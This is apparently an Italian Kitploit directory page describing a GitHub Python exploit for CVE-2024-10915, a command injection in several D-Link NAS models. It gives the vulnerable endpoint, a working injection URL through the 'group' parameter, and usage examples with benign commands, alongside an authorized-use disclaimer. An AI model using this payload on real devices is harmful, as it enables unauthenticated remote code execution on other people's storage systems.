Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10915 | Kitploit
Strumenti/GitHubGitHub/r0otk3r/cve-2024-10915
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-10915 - Exploit di Command Injection su NAS D-Link

Questo exploit basato su Python prende di mira una vulnerabilità di command injection in diversi prodotti NAS D-Link tramite l'endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnerabilità consente ad attaccanti non autenticati di eseguire comandi di sistema arbitrari sul dispositivo interessato.

Descrizione

CVE-2024-10915 colpisce diversi modelli di NAS D-Link. Un attaccante può iniettare comandi tramite il parametro group nel comando cgi_user_add, portando all'esecuzione remota di codice.

Prodotti Colpiti

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Vulnerable Endpoint: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Esempio:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Requisiti

  • Python 3.x

  • libreria requests

Installa le dipendenze richieste:

root@kitploit:~
pip3 install requests

Utilizzo

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Opzioni:

Esempio 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Esempio 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Esempio 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Disclaimer

Questo progetto è destinato esclusivamente a scopo educativo e a test autorizzati. Non utilizzare questo strumento su reti o sistemi per i quali non disponi di esplicita autorizzazione. Gli autori non si assumono alcuna responsabilità per un uso improprio o per eventuali danni causati.


Canali Ufficiali

  • YouTube @rootctf
  • X @r0otk3r
Scarica lo strumento
OpzioneDescrizione
-u / --urlURL di base del target (es. http://192.168.1.100)
-c / --commandComando da eseguire sul dispositivo (predefinito: id)
-p / --proxyUsa un proxy HTTP (es. http://127.0.0.1:8080)
-o / --outputSalva la risposta HTTP in un file
-l / --listElenca i prodotti NAS D-Link interessati